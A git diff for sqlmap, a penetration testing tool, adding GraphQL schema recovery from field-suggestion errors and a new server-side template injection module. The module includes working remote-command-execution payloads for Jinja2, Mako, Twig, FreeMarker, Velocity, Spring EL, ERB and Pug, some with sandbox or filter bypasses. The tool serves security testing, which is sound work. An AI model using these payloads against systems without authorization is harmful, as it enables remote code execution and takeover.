- techniques.add_argument("--nosql", dest="nosql", action="store_true",
- help="Test for NoSQL injection (e.g. MongoDB, CouchDB, Neo4j)")
-
- techniques.add_argument("--graphql", dest="graphql", action="store_true",
- help="Test for GraphQL injection (introspection, field/argument fuzzing, SQL/NoSQL payload families)")
-
- techniques.add_argument("--ldap", dest="ldap", action="store_true",
- help="Test for LDAP injection (filter breakout, boolean blind, auth bypass)")
-
techniques.add_argument("--time-sec", dest="timeSec", type=int,
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)
@@ -451,6 +442,21 @@ def cmdLineParser(argv=None):
techniques.add_argument("--second-req", dest="secondReq",
help="Load second-order HTTP request from file")
+ techniques.add_argument("--graphql", dest="graphql", action="store_true",
+ help="Test for GraphQL injection")
+
+ techniques.add_argument("--ldap", dest="ldap", action="store_true",
+ help="Test for LDAP injection")
+
+ techniques.add_argument("--nosql", dest="nosql", action="store_true",
+ help="Test for NoSQL injection")
+
+ techniques.add_argument("--xpath", dest="xpath", action="store_true",
+ help="Test for XPath injection")
+
+ techniques.add_argument("--ssti", dest="ssti", action="store_true",
+ help="Test for server-side template injection")
+
# Fingerprint options
fingerprint = parser.add_argument_group("Fingerprint", "These options can be used to perform a back-end database management system version fingerprint")
@@ -565,6 +571,12 @@ def cmdLineParser(argv=None):
enumeration.add_argument("--sql-shell", dest="sqlShell", action="store_true",
help="Prompt for an interactive SQL shell")
+ enumeration.add_argument("--ssti-query", dest="sstiQuery",
+ help="SSTI expression to evaluate in-band on the vulnerable parameter")
+
+ enumeration.add_argument("--ssti-shell", dest="sstiShell", action="store_true",
+ help="Prompt for an interactive SSTI expression shell")
+
enumeration.add_argument("--sql-file", dest="sqlFile",
help="Execute SQL statements from given file(s)")
diff --git a/lib/techniques/graphql/inject.py b/lib/techniques/graphql/inject.py
index f56139d927..c058cd64b7 100644
--- a/lib/techniques/graphql/inject.py
+++ b/lib/techniques/graphql/inject.py
@@ -22,8 +22,10 @@
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import POST_HINT
from lib.core.settings import ERROR_PARSING_REGEXES
+from lib.core.settings import GRAPHQL_ARG_WORDLIST
from lib.core.settings import GRAPHQL_ENDPOINT_PATHS
from lib.core.settings import GRAPHQL_ERROR_REGEX
+from lib.core.settings import GRAPHQL_FIELD_WORDLIST
from lib.core.settings import GRAPHQL_INTROSPECTION_QUERY
from lib.core.settings import NOSQL_ERROR_REGEX
from lib.core.settings import UPPER_RATIO_BOUND
@@ -354,6 +356,90 @@ def _introspect(endpoint):
return None
+# --- Schema recovery via field suggestions (introspection disabled) ---------
+
+def _gqlErrors(page):
+    # Collect the "message" text of every object found under the response's "errors" key.
+    # A body that does not parse to a JSON object, or that carries no errors, yields [].
+    envelope = _parseJSON(page)
+    messages = []
+    if isinstance(envelope, dict):
+        for entry in envelope.get("errors") or []:
+            if isinstance(entry, dict):
+                messages.append(getUnicode(entry.get("message", "")))
+    return messages
+
+
+def _harvestSuggestions(message):
+    # Return, in order of appearance, every quoted identifier that follows the "Did you mean"
+    # marker of a GraphQL validation message. Both quote styles are accepted
+    # ('a', 'b', or 'c' / "a" or "b"); a message without the marker gives [].
+    marker = "Did you mean"
+    if marker not in message:
+        return []
+    # only the text from the marker onwards is scanned, so names quoted earlier in the
+    # message (the unknown field, the parent type) are not picked up
+    tail = message[message.index(marker):]
+    return re.findall(r"""['"]([A-Za-z_][A-Za-z0-9_]*)['"]""", tail)
+
+
+def _suggestFields(endpoint, op):
+    # Recover root field names for an operation ("query", anything else is sent as a mutation)
+    # via suggestion harvesting: probe a random (guaranteed-unknown) field to collect the closest
+    # matches, then confirm/expand using the seed wordlist. A seed is accepted as a real field
+    # only when it comes back as a key of the response's `data` object.
+    # Returns the sorted list of recovered names (possibly empty).
+    prefix = "" if op == "query" else "mutation "
+    seeds = list(GRAPHQL_FIELD_WORDLIST)
+    known = set(seeds)  # built once so the per-probe membership test is O(1)
+    found = set()
+
+    for seed in [randomStr(length=10, lowercase=True)] + seeds:
+        page, _ = _gqlSend(endpoint, "%s{ %s }" % (prefix, seed))
+        doc = _parseJSON(page)
+        if not isinstance(doc, dict):
+            # no JSON object to inspect (unparsable body, or a JSON array/scalar on which
+            # .get() would raise AttributeError) - same guard as _gqlErrors()
+            continue
+
+        for entry in (doc.get("errors") or []):
+            message = getUnicode(entry.get("message", "")) if isinstance(entry, dict) else ""
+            # "on type" restricts harvesting to unknown-FIELD messages
+            if "Did you mean" in message and "on type" in message:
+                found.update(_harvestSuggestions(message))
+
+        # a seeded name counts as a real field only if it actually resolved (appears in `data`);
+        # "no unknown-field error" alone is too weak (lenient servers accept anything)
+        data = doc.get("data")
+        if seed in known and isinstance(data, dict) and seed in data:
+            found.add(seed)
+
+    return sorted(found)
+
+
+def _suggestArgs(endpoint, op, field):
+    # Request `field` with a random (unknown) argument and harvest the names offered in the
+    # server's "Unknown argument ... Did you mean ..." reply; returns them sorted (may be empty)
+    opKeyword = "mutation " if op != "query" else ""
+    unknownArg = randomStr(length=10, lowercase=True)
+    query = '%s{ %s(%s: 1) }' % (opKeyword, field, unknownArg)
+    page, _ = _gqlSend(endpoint, query)
+
+    names = set()
+    relevant = [text for text in _gqlErrors(page) if "Unknown argument" in text]
+    for text in relevant:
+        names.update(_harvestSuggestions(text))
+    return sorted(names)
+
+
+def _introspectViaSuggestions(endpoint):
+    # Fallback schema recovery when introspection is disabled but the server still leaks field/argument
+    # names through "Did you mean" validation errors. Builds best-effort Slots: known scalar arg types
+    # are unavailable here, so we default to the 'string' strategy (the most broadly injectable) and let
+    # the per-slot injection oracle confirm which (field, argument) pairs are actually vulnerable.
+    #
+    # Returns a list of Slot objects (one per recovered field/argument pair), or None when the gate
+    # probe shows no suggestion or nothing could be recovered.
+
+    # Gate: one request for a random root field; give up unless some error message in the reply
+    # contains "Did you mean".
+    # NOTE(review): suggestion logic usually proposes only names close to the unknown one, so a
+    # random 10-letter probe may draw no suggestion even from a server that leaks them - confirm
+    probe = randomStr(length=10, lowercase=True)
+    page, _ = _gqlSend(endpoint, "{ %s }" % probe)
+    if not any("Did you mean" in m for m in _gqlErrors(page)):
+        return None
+
+    logger.info("introspection is disabled; recovering the schema from field-suggestion errors")
+
+    slots = []
+    # the second element of each pair is passed to Slot as the parent type name
+    for op, parentName in (("query", "Query"), ("mutation", "Mutation")):
+        fields = _suggestFields(endpoint, op)
+        if not fields:
+            continue
+        logger.info("recovered %d %s field(s) via suggestions: %s" % (
+            len(fields), op, ", ".join(fields)))
+        for field in fields:
+            # no argument suggestion for this field -> try every name of the argument wordlist
+            args = _suggestArgs(endpoint, op, field) or list(GRAPHQL_ARG_WORDLIST)
+            for arg in args:
+                # returnSel="" renders as "{ __typename }" (valid on any OBJECT); strategy="string"
+                slots.append(Slot(op, parentName, field, [(arg, {}, None)],
+                                  arg, "string", "OBJECT", "", ""))
+    # an empty list is reported as None so callers can test the result for truthiness
+    return slots or None
+
+
# --- Schema walking ---------------------------------------------------------
def _extractSlots(schema):
@@ -1087,11 +1173,11 @@ def graphqlScan():
global SENTINEL
SENTINEL = randomStr(length=10, lowercase=True)
- infoMsg = "'--graphql' is self-contained: it discovers the GraphQL endpoint, "
- infoMsg += "enumerates the schema, and injects SQL/NoSQL payloads into reachable "
- infoMsg += "argument slots. SQL enumeration switches (e.g. --banner, --dbs, "
- infoMsg += "--tables) are ignored"
- logger.info(infoMsg)
+ debugMsg = "'--graphql' is self-contained: it discovers the GraphQL endpoint, "
+ debugMsg += "enumerates the schema, and injects SQL/NoSQL payloads into reachable "
+ debugMsg += "argument slots. SQL enumeration switches (e.g. --banner, --dbs, "
+ debugMsg += "--tables) are ignored"
+ logger.debug(debugMsg)
url = conf.url.rstrip("/") if conf.url else ""
@@ -1120,19 +1206,22 @@ def graphqlScan():
# 2. Schema introspection
logger.info("introspecting the GraphQL schema")
schema = _introspect(endpoint)
- if not schema:
- logger.error("introspection failed (disabled or the endpoint rejected the query)")
- return
-
- types = schema.get("types") or []
- logger.info("introspection returned %d types" % len(types))
- # 3. Slot enumeration
- slots = _extractSlots(schema)
- if not slots:
- logger.warning("no injectable argument slots found in the schema")
- _dumpSchema(schema, endpoint)
- return
+ if schema:
+ types = schema.get("types") or []
+ logger.info("introspection returned %d types" % len(types))
+ slots = _extractSlots(schema)
+ if not slots:
+ logger.warning("no injectable argument slots found in the schema")
+ _dumpSchema(schema, endpoint)
+ return
+ else:
+ # Introspection blocked: try to recover the schema from field-suggestion errors
+ logger.warning("introspection failed (disabled or rejected); trying suggestion-based recovery")
+ slots = _introspectViaSuggestions(endpoint)
+ if not slots:
+ logger.error("could not recover the schema (introspection disabled and no field suggestions)")
+ return
querySlots = [_ for _ in slots if _.operation == "query"]
mutationSlots = [_ for _ in slots if _.operation == "mutation"]
@@ -1141,8 +1230,10 @@ def graphqlScan():
len(slots), len(querySlots), len(mutationSlots)))
# 4. Schema dump (before detection -- matches regular sqlmap table/column
- # enumeration preceding data retrieval)
- _dumpSchema(schema, endpoint)
+ # enumeration preceding data retrieval). Only when introspection succeeded; the
+ # suggestion-recovered path has no full schema document to render.
+ if schema:
+ _dumpSchema(schema, endpoint)
if mutationSlots:
names = sorted(set("%s(%s:)" % (_.fieldName, _.targetArg) for _ in mutationSlots))
diff --git a/lib/techniques/ldap/inject.py b/lib/techniques/ldap/inject.py
index 446a4ce8f3..eb1ef1f188 100644
--- a/lib/techniques/ldap/inject.py
+++ b/lib/techniques/ldap/inject.py
@@ -24,15 +24,11 @@
from lib.core.settings import LDAP_ERROR_SIGNATURES
from lib.core.settings import LDAP_FINGERPRINT_ATTRIBUTES
from lib.core.settings import LDAP_MAX_LENGTH
+from lib.core.settings import LDAP_MAX_RECORDS
from lib.core.settings import UPPER_RATIO_BOUND
from lib.request.connect import Connect as Request
from lib.utils.xrange import xrange
-try:
- from lib.core.settings import LDAP_MAX_RECORDS
-except ImportError:
- LDAP_MAX_RECORDS = 20
-
SENTINEL = randomStr(length=10, lowercase=True)
@@ -644,10 +640,10 @@ def ldapScan():
global SENTINEL
SENTINEL = randomStr(length=10, lowercase=True)
- infoMsg = "'--ldap' is self-contained: it detects LDAP injection in HTTP "
- infoMsg += "parameters and dumps reachable directory entries. SQL enumeration "
- infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
- logger.info(infoMsg)
+ debugMsg = "'--ldap' is self-contained: it detects LDAP injection in HTTP "
+ debugMsg += "parameters and dumps reachable directory entries. SQL enumeration "
+ debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
+ logger.debug(debugMsg)
if not conf.paramDict:
logger.error("no request parameters to test (use --data, GET params, or similar)")
diff --git a/lib/techniques/nosql/inject.py b/lib/techniques/nosql/inject.py
index 9d4a22daea..0b262e3182 100644
--- a/lib/techniques/nosql/inject.py
+++ b/lib/techniques/nosql/inject.py
@@ -684,10 +684,10 @@ def nosqlScan():
# NoSQL injection from an application-scoped point is confined to the back-end's single query
# (one collection/label) - it confirms and dumps what that query can reach, with no analog to the
# SQL database/table/user/banner enumeration, so those switches do not apply here
- infoMsg = "'--nosql' is self-contained: it confirms the injection and dumps the reachable "
- infoMsg += "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, "
- infoMsg += "--users, --sql-query) do not map to a NoSQL back-end and are ignored"
- logger.info(infoMsg)
+ debugMsg = "'--nosql' is self-contained: it confirms the injection and dumps the reachable "
+ debugMsg += "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, "
+ debugMsg += "--users, --sql-query) do not map to a NoSQL back-end and are ignored"
+ logger.debug(debugMsg)
tested = found = 0
diff --git a/lib/techniques/ssti/__init__.py b/lib/techniques/ssti/__init__.py
new file mode 100644
index 0000000000..bcac841631
--- /dev/null
+++ b/lib/techniques/ssti/__init__.py
@@ -0,0 +1,8 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+pass
diff --git a/lib/techniques/ssti/inject.py b/lib/techniques/ssti/inject.py
new file mode 100644
index 0000000000..93251af7e3
--- /dev/null
+++ b/lib/techniques/ssti/inject.py
@@ -0,0 +1,814 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+import difflib
+import re
+import time
+
+from collections import namedtuple
+
+from lib.core.common import beep
+from lib.core.common import randomInt
+from lib.core.common import randomStr
+from lib.core.convert import getUnicode
+from lib.core.data import conf
+from lib.core.data import logger
+from lib.core.enums import CUSTOM_LOGGING
+from lib.core.enums import PLACE
+from lib.core.settings import SSTI_ERROR_SIGNATURES
+from lib.core.settings import UPPER_RATIO_BOUND
+from lib.request.connect import Connect as Request
+
+
+# Random 10-letter lowercase marker; sstiScan() replaces it with a fresh value on every scan
+SENTINEL = randomStr(length=10, lowercase=True)
+
+# Request places whose parameters sstiScan() walks (those also present in conf.paramDict)
+SSTI_PLACES = (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.CUSTOM_POST)
+
+# Each Engine entry defines detection payloads and expected behaviour for one
+# template engine. Arithmetic fields carry two %d placeholders that _arithmeticPayload()
+# fills (by literal replacement) with randomInt() operands at probe time, so a static
+# "49" on the page cannot produce a false positive.
+# Engines are listed in detection-priority order: _fingerprint() keeps the first engine
+# reaching the best score, so on a tie the earlier entry wins.
+# String fields documented as 'or ""' use the empty string to mean "not available".
+Engine = namedtuple("Engine", (
+    "name",                     # human-readable engine name
+    "family",                   # language family (python, php, java, ruby, nodejs)
+    "delimiter",                # expression delimiter opening (e.g. "{{")
+    "delimiterClose",           # expression delimiter closing (e.g. "}}")
+    "errorRegex",               # combined engine-specific error regex (None for "no specific signature")
+    "errorProbes",              # tuple of malformed payload suffixes that trigger engine errors
+    "arithmeticFmt",            # arithmetic proof with two %d placeholders (e.g. "{{ %d*%d }}"), or ""
+    "arithmeticUnescapedFmt",   # same with escape bypass (e.g. "{{ (%d*%d)|safe }}"), or ""
+    "booleanTrue",              # boolean true payload
+    "booleanFalse",             # boolean false payload
+    "trueRendered",             # what true renders as (for response matching)
+    "falseRendered",            # what false renders as
+    "distinguishingProbe",      # cross-engine disambiguation probe (None if n/a)
+    "distinguishingResult",     # expected substring from disambiguation probe
+    "expressionFmt",            # format string for wrapping expressions (e.g. "{{ %s }}"), or ""
+    "rcePayloads",              # tuple of (payload_template, description) with {CMD} for command, or ()
+))
+
+
+def _arithmeticPayload(fmt, a, b):
+    # Fill the first two '%d' tokens of `fmt` with `a` and `b` (in that order) using plain text
+    # replacement. %-formatting is avoided on purpose: delimiters such as ERB's '<%= ... %>'
+    # contain a literal '%', on which fmt % (a, b) would raise ValueError and silently switch
+    # arithmetic detection off for that engine.
+    payload = fmt
+    for operand in (a, b):
+        payload = payload.replace("%d", str(operand), 1)
+    return payload
+
+
+def _expressionPayload(fmt, value):
+    # Wrap `value` in an engine's expression format by replacing the FIRST '%s' token of `fmt`;
+    # a format without '%s' is returned unchanged.
+    # Same rationale as _arithmeticPayload(): literal %s substitution so '%'-delimited engines
+    # (notably ERB) can wrap expressions instead of crashing on fmt % value.
+    return fmt.replace("%s", value, 1)
+
+
+def _degroup(text):
+    # Strip digit-group (thousands) separators so an arithmetic result still matches when the
+    # engine formats large numbers with grouping (e.g. FreeMarker renders 234*567 as "132,678").
+    # Only separators sitting between digits are removed, so ordinary text is untouched.
+    # Recognised separators: comma, U+00A0, U+202F, U+2009 and the apostrophe; the look-behind /
+    # look-ahead pair requires a digit on both sides. The input is passed through getUnicode() first.
+    return re.sub(u"(?<=\\d)[,\u00a0\u202f\u2009']" + u"(?=\\d)", "", getUnicode(text))
+
+
+# Known template engines, one positional Engine(...) per entry (argument order = Engine field order).
+# _fingerprint() walks this tuple from top to bottom.
+# NOTE(review): some errorRegex values contain very short bare alternatives (e.g. 'erb', 'pug',
+# 'jade') that can also match ordinary page text such as "verb" - confirm they are specific enough.
+_ENGINE_TABLE = (
+    # -- Python -------------------------------------------------------------------------------------------
+    Engine("Jinja2", "python",
+        "{{", "}}",
+        r"(?i)(?:jinja2\.exceptions\.\w+|TemplateSyntaxError|UndefinedError|TemplateNotFound|TemplateAssertionError)",
+        ("{{", "{{ }}", "{{ unknown|filter }}"),
+        "{{ %d*%d }}", "{{ (%d*%d)|safe }}",
+        "{{ True }}", "{{ False }}", "True", "False",
+        None, None,  # Jinja2/Twig distinguished by trueRendered ("True"/"False" vs "1"/"")
+        "{{ %s }}",
+        # Jinja2: try multiple RCE paths in order (cycler -> config -> lipsum -> attr()-chain).
+        # The last one is dot-/underscore-free (filters + \x5f-escaped dunders), bypassing
+        # sanitisers that block '.'/'_' (the CVE-2025-23211 Tandoor technique).
+        (("{{ cycler.__init__.__globals__.os.popen('{CMD}').read() }}", "cycler.__globals__"),
+         ("{{ config.from_envvar.__globals__.__builtins__.__import__('os').popen('{CMD}').read() }}", "config.from_envvar chain"),
+         ("{{ lipsum.__globals__.os.popen('{CMD}').read() }}", "lipsum.__globals__"),
+         ("{{ cycler|attr('\\x5f\\x5finit\\x5f\\x5f')|attr('\\x5f\\x5fglobals\\x5f\\x5f')|attr('\\x5f\\x5fgetitem\\x5f\\x5f')('os')|attr('popen')('{CMD}')|attr('read')() }}", "attr() filter chain (dot/underscore-free)"))),
+    Engine("Mako", "python",
+        "${", "}",
+        r"(?i)(?:mako\.exceptions\.\w+|mako\.runtime|CompileException|SyntaxException)",
+        ("${", "${}", "<%", "<%!"),
+        "${%d*%d}", "",
+        "${True}", "${False}", "True", "False",
+        None, None,  # capital True/False uniquely identifies Mako within the ${ } family (Freemarker/Spring render lowercase true/false)
+        "${%s}",
+        # Mako: popen captures output; self.module.runtime path needs no <%import%> preamble
+        (("${self.module.runtime.util.os.popen('{CMD}').read()}", "self.module.runtime.util.os.popen"),
+         ("<%import os%>${os.popen('{CMD}').read()}", "import os + popen"))),
+    # -- PHP ----------------------------------------------------------------------------------------------
+    Engine("Twig", "php",
+        "{{", "}}",
+        r"(?i)(?:Twig[\\_]Error|Twig[\\_]Environment|syntax error, unexpected|Unknown (?:filter|function|test|tag))",
+        ("{{", "{{ }}", "{{ unknown|filter }}"),
+        "{{ %d*%d }}", "{{ (%d*%d)|raw }}",
+        "{{ true }}", "{{ false }}", "1", "",
+        # '_self' renders 'Twig_Template' (Twig 1) or '__string_template__...' (Twig 2/3);
+        # 'emplate' is the substring common to both, so the probe is version-stable
+        "{{ _self }}", "emplate",
+        "{{ %s }}",
+        # Twig: filter() chain first; then sort()/map() callbacks, which double as classic
+        # sandbox escapes when 'filter' is not on the policy allow-list (DEEP1 Phishtale)
+        (("{{ ['{CMD}']|filter('system') }}", "filter('system')"),
+         ("{{ ['{CMD}']|filter('exec') }}", "filter('exec')"),
+         ("{{ ['{CMD}']|filter('shell_exec') }}", "filter('shell_exec')"),
+         ("{{ ['{CMD}', '']|sort('system')|join }}", "sort('system') sandbox escape"),
+         ("{{ ['{CMD}']|map('system')|join }}", "map('system') sandbox escape"))),
+    # -- Java ---------------------------------------------------------------------------------------------
+    Engine("Freemarker", "java",
+        "${", "}",
+        r"(?i)(?:freemarker\.(?:core|template|extract|cache)\.\w+|ParseException|InvalidReferenceException|TemplateException)",
+        ("${", "${}", "<#if ", "<#--"),
+        "${%d*%d}", "${(%d*%d)?no_esc}",
+        # modern FreeMarker errors on a bare ${true} ("boolean_format"); ?c gives the
+        # computer-format "true"/"false" string, so the boolean oracle works on real FreeMarker
+        "${true?c}", "${false?c}", "true", "false",
+        # Freemarker '?builtin' syntax (SpEL/Thymeleaf can't parse '?upper_case' -> errors there),
+        # giving an intrinsic, non-empty discriminator from Spring within the shared '${ }' family
+        '${"sstimark"?upper_case}', "SSTIMARK",
+        "${%s}",
+        # Freemarker: classic -> indirect-assign fallback
+        (("${'freemarker.template.utility.Execute'?new()('{CMD}')}", "Execute?new"),
+         ("<#assign ex='freemarker.template.utility.Execute'?new()>${ex('{CMD}')}", "assign+new"))),
+    Engine("Velocity", "java",
+        "$", "",
+        r"(?i)(?:org\.apache\.velocity\.(?:runtime|exception)\.\w+|ParseErrorException|MethodInvocationException|ResourceNotFoundException)",
+        ("$", "#if(", "#set($x=)"),
+        "", "",
+        "#if(true) TRUE #end", "#if(false) TRUE #else FALSE #end", "TRUE", "FALSE",
+        "#* velocity *#", "",
+        "",  # no generic expression wrapper
+        # Velocity: full reflection chain (pre-2.3 only; patched by CVE-2020-13936)
+        (("#set($str=$class.inspect('java.lang.String').type)\n"
+          "#set($chr=$class.inspect('java.lang.Character').type)\n"
+          "#set($ex=$class.inspect('java.lang.Runtime').type.getRuntime().exec('{CMD}'))\n"
+          "$ex.waitFor()\n"
+          "#set($out=$ex.getInputStream())\n"
+          "#foreach($i in [1..$out.available()])\n"
+          "$str.valueOf($chr.toChars($out.read()))\n"
+          "#end", "reflection chain"),)),
+    Engine("Spring EL / Thymeleaf", "java",
+        "${", "}",
+        r"(?i)(?:org\.springframework\.expression\.\w+|org\.thymeleaf\.\w+|SpelEvaluationException|TemplateProcessingException|ExpressionParsingException|ValidationFailedException)",
+        ("${", "${}", "#{", "*{"),
+        "${%d*%d}", "",
+        "${true}", "${false}", "true", "false",
+        # SpEL Java method call (Freemarker uses '?upper_case', not '.toUpperCase()' -> errors
+        # there), giving an intrinsic, non-empty discriminator from Freemarker in '${ }'
+        "${'sstimark'.toUpperCase()}", "SSTIMARK",
+        "${%s}",
+        # SpEL: read the process stdout (so output is captured, not just a Process object);
+        # then a blind exec; then the OGNL form for engines that parse OGNL instead of SpEL
+        (("${new java.io.BufferedReader(new java.io.InputStreamReader(T(java.lang.Runtime).getRuntime().exec('{CMD}').getInputStream())).readLine()}", "SpEL readLine (output)"),
+         ("${T(java.lang.Runtime).getRuntime().exec('{CMD}')}", "T(Runtime).exec (blind)"),
+         ("${(#rt=@java.lang.Runtime@getRuntime()).exec('{CMD}')}", "OGNL @Runtime@getRuntime (blind)"))),
+    # -- Ruby ---------------------------------------------------------------------------------------------
+    Engine("ERB", "ruby",
+        "<%=", "%>",
+        r"(?i)(?:erb|SyntaxError|undefined local variable|no implicit conversion|wrong number of arguments|\(erb\):\d+)",
+        ("<%=", "<%", "<%#", "<%= foo.unknown_method %>"),
+        "<%= %d*%d %>", "<%= raw %d*%d %>",
+        "<%= true %>", "<%= false %>", "true", "false",
+        "<%= defined? Rails %>", "",
+        "<%= %s %>",
+        # ERB: backtick captures output; system() returns only exit status
+        (("<%= `{CMD}` %>", "backtick"),)),
+    # -- Node.js ------------------------------------------------------------------------------------------
+    Engine("Pug/Jade", "nodejs",
+        "#{", "}",
+        r"(?i)(?:pug|jade|Cannot read propert|is not a function|TypeError|ReferenceError)",
+        ("#{", "!{", "#{ }"),
+        "#{%d*%d}", "!{%d*%d}",
+        "#{true}", "#{false}", "true", "false",
+        None, None,
+        "#{%s}",
+        (("#{global.process.mainModule.require('child_process').execSync('{CMD}')}", "execSync"),)),
+    Engine("Handlebars", "nodejs",
+        "{{", "}}",
+        r"(?i)(?:handlebars|Handlebars|Parse error on line|\{\{[\w.]+\}\})",
+        ("{{", "{{#if}}", "{{/each}}"),
+        "", "",
+        "{{#if true}}yes{{/if}}", "{{#if false}}yes{{/if}}", "yes", "",
+        None, None,
+        "",  # no generic expression wrapper without registered helpers
+        ()),  # RCE requires pre-registered helpers; not generically exploitable
+)
+
+
+def _ratio(first, second):
+    # Similarity of two pages as SequenceMatcher.quick_ratio() (an upper bound on ratio());
+    # a falsy argument (None, "") is compared as the empty string
+    left = first if first else ""
+    right = second if second else ""
+    matcher = difflib.SequenceMatcher(None, left, right)
+    return matcher.quick_ratio()
+
+
+def _delim(place):
+    # Separator between name=value pairs of a place: conf.cookieDel (default ';') for cookies,
+    # '&' for every other place
+    if place != PLACE.COOKIE:
+        return '&'
+    return conf.cookieDel or ';'
+
+
+def _confParameters(place):
+    # Raw parameter string stored in conf.parameters for `place`, or "" when there is none
+    try:
+        return conf.parameters.get(place, "")
+    except AttributeError:
+        # reached when the .get() lookup raises AttributeError: fall back to plain
+        # membership test + indexing, which need no dict-style .get()
+        return conf.parameters[place] if place in conf.parameters else ""
+
+
+def _originalValue(place, parameter):
+    # Current value of `parameter`: taken from the first matching name=value segment of the raw
+    # parameter string, otherwise from conf.paramDict; "" when neither has a (truthy) value
+    raw = _confParameters(place)
+    for chunk in raw.split(_delim(place)):
+        key, _, current = chunk.partition('=')
+        if key.strip() != parameter:
+            continue
+        return current
+
+    fallback = conf.paramDict.get(place, {}).get(parameter)
+    return fallback or ""
+
+
+def _replaceSegment(place, parameter, value):
+    # Build the parameter string for `place` with `parameter` set to `value`.
+    # The first name=value segment whose (stripped) name equals `parameter` is rewritten and all
+    # other segments are kept verbatim. When no segment matches, the string is rebuilt from
+    # conf.paramDict instead, substituting `value` for the target parameter.
+    separator = _delim(place)
+    segments = _confParameters(place).split(separator)
+
+    for index, segment in enumerate(segments):
+        key = segment.partition('=')[0]
+        if key.strip() == parameter:
+            # the name is written back exactly as found (surrounding whitespace included)
+            segments[index] = "%s=%s" % (key, value)
+            return separator.join(segments)
+
+    rebuilt = ["%s=%s" % (key, value if key == parameter else previous)
+               for key, previous in conf.paramDict.get(place, {}).items()]
+    return separator.join(rebuilt)
+
+
+def _send(place, parameter, value):
+    """Issue a single HTTP request with the target parameter set to `value`.
+    Temporarily mutates conf.parameters so sqlmap's normal request machinery
+    (URL construction, cookies, headers, encodings) is fully preserved."""
+
+    # Returns the response page, or "" when the page is empty/None or the request raised
+
+    # sleep for conf.delay seconds before the probe when a delay is set
+    if conf.delay:
+        time.sleep(conf.delay)
+
+    # swap the modified parameter string in; the finally clause below puts the old one back
+    old_params = conf.parameters.get(place, "")
+    conf.parameters[place] = _replaceSegment(place, parameter, value)
+
+    try:
+        kwargs = {"raise404": False, "silent": True}
+        # payload logging only at verbosity 3 and above
+        if conf.verbose >= 3:
+            logger.log(CUSTOM_LOGGING.PAYLOAD, "%s=%s" % (parameter, value))
+        page, _, _ = Request.getPage(**kwargs)
+        # a falsy page is normalised to "", so callers never receive None
+        return page or ""
+    except Exception as ex:
+        # best effort: any failure is logged at debug level and reported as an empty page
+        logger.debug("SSTI probe request failed: %s" % getUnicode(ex))
+        return ""
+    finally:
+        # runs on both the success and the failure path
+        conf.parameters[place] = old_params
+
+
+def _isError(page, engine):
+    # True when the engine has an error regex and it matches somewhere in `page`
+    # (None/empty pages are searched as "")
+    pattern = engine.errorRegex
+    if pattern:
+        return re.search(pattern, getUnicode(page or "")) is not None
+    return False
+
+
+def _backendFromError(page):
+    # Name of the first SSTI_ERROR_SIGNATURES entry whose regex matches `page`, else None
+    text = getUnicode(page or "")
+    matching = (name for name, regex in SSTI_ERROR_SIGNATURES if re.search(regex, text))
+    return next(matching, None)
+
+
+def _boolean(truthy, falsy):
+    """Fetch the true and the false probe twice each and return the first true page when
+    both are reproducible and differ from one another; return None otherwise.
+    `truthy` and `falsy` are zero-argument callables returning a page."""
+
+    def _reproducible(fetch):
+        # first of two fetches, or None when it is None or the repeat is not similar enough
+        first = fetch()
+        if first is None:
+            return None
+        if _ratio(first, fetch()) < UPPER_RATIO_BOUND:
+            return None
+        return first
+
+    truePage = _reproducible(truthy)
+    if truePage is None:
+        return None
+
+    falsePage = _reproducible(falsy)
+    if falsePage is None:
+        return None
+
+    # the two stable pages must diverge for the pair to work as an oracle
+    diverges = _ratio(truePage, falsePage) < UPPER_RATIO_BOUND
+    return truePage if diverges else None
+
+
+def _probeArithmetic(place, parameter, engine):
+    """Prove in-band evaluation with two random multiplications that share one operand.
+    Each product has to show up in the response to its own payload and in that response
+    only, so a number that merely happens to be on the page cannot pass. The escaped
+    format is tried first, then the unescaped variant. Returns True on proof, else False."""
+
+    if not engine.arithmeticFmt:
+        return False
+
+    base = _originalValue(place, parameter) or ""
+    left, right = randomInt(3), randomInt(3)
+    control = right + 1  # different operand -> different result
+    expected, expectedControl = str(left * right), str(left * control)
+
+    for template in (engine.arithmeticFmt, engine.arithmeticUnescapedFmt):
+        if not template:
+            continue
+
+        try:
+            payload = base + _arithmeticPayload(template, left, right)
+            payloadControl = base + _arithmeticPayload(template, left, control)
+        except (ValueError, TypeError):
+            logger.debug("SSTI arithmetic: format failed for engine '%s' with fmt=%r" % (engine.name, template))
+            continue
+
+        page = _send(place, parameter, payload)
+        pageControl = _send(place, parameter, payloadControl)
+        if not (page and pageControl):
+            continue
+
+        raw, rawControl = getUnicode(page), getUnicode(pageControl)
+
+        # a payload echoed back verbatim was not evaluated by the template
+        if payload in raw or payloadControl in rawControl:
+            continue
+
+        # products are looked up in a copy without digit-group separators (e.g. "132,678");
+        # the reflection check above deliberately used the untouched text
+        seen, seenControl = _degroup(raw), _degroup(rawControl)
+
+        inOwnResponse = expected in seen and expectedControl in seenControl
+        inOtherResponse = expectedControl in seen or expected in seenControl
+        if inOwnResponse and not inOtherResponse:
+            return True
+
+    return False
+
+
+def _probeError(place, parameter, engine):
+    """Inject each error probe suffix and check for engine-specific error messages.
+
+    Returns the first response matching engine.errorRegex, or None when the engine has no
+    regex/probes, when no probe produces a match, or when the signature is already present
+    in the response to the unmodified value (so it cannot be attributed to a probe)."""
+    if not engine.errorRegex or not engine.errorProbes:
+        return None
+
+    original = _originalValue(place, parameter) or ""
+
+    for probe in engine.errorProbes:
+        page = _send(place, parameter, original + probe)
+        if not page or not _isError(page, engine):
+            continue
+
+        # Control request, issued only once a probe has matched: several signatures are plain
+        # words (e.g. 'erb', 'pug', 'TypeError') that ordinary page content can contain. If the
+        # untouched value already yields a match, no probe response is evidence of anything.
+        baseline = _send(place, parameter, original)
+        if _isError(baseline, engine):
+            return None
+        return page
+
